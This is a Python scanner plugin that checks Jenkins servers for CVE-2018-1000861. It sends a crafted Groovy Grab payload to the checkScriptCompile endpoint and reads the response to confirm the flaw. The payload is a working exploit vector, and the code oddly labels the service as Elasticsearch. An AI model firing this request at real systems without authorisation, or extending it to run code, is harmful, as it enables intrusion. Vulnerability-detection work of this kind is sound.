#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @author = 'orleven'

import random
from lib.utils.connect import ClientSession
from lib.core.enums import VUL_LEVEL
from lib.core.enums import VUL_TYPE
from lib.core.enums import SERVICE_PORT_MAP
from script import Script, VUL_TYPE, VUL_LEVEL

class POC(Script):
    def __init__(self, target=None):
        self.service_type = SERVICE_PORT_MAP.ELASTICSEARCH
        self.name = 'CVE-2018-1000861'
        self.keyword = ['jenkins']
        self.info = 'CVE-2018-1000861'
        self.type = VUL_TYPE.RCE
        self.level = VUL_LEVEL.CRITICAL
        self.refer = 'https://github.com/chaitin/xray/blob/master/pocs/jenkins-cve-2018-1000861-rce.yml'
        Script.__init__(self, target=target, service_type=self.service_type)

    async def prove(self):
        await self.get_url()
        if self.base_url:
            if self.base_url != None:
                async with ClientSession() as session:
                    random_str = str(random.randint(100000, 999999))
                    url = self.base_url + "securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27" + random_str+ "%27,%20version=%271%27)%0aimport%20Payload;"
                    async with session.get(url=url, allow_redirects=False) as res:
                        if res and res.status == 200:
                            text = await res.text()
                            if 'package#' in text and random_str in text:
                                self.flag = 1
                                self.res.append({"info": url, "key": "CVE-2018-1000861"})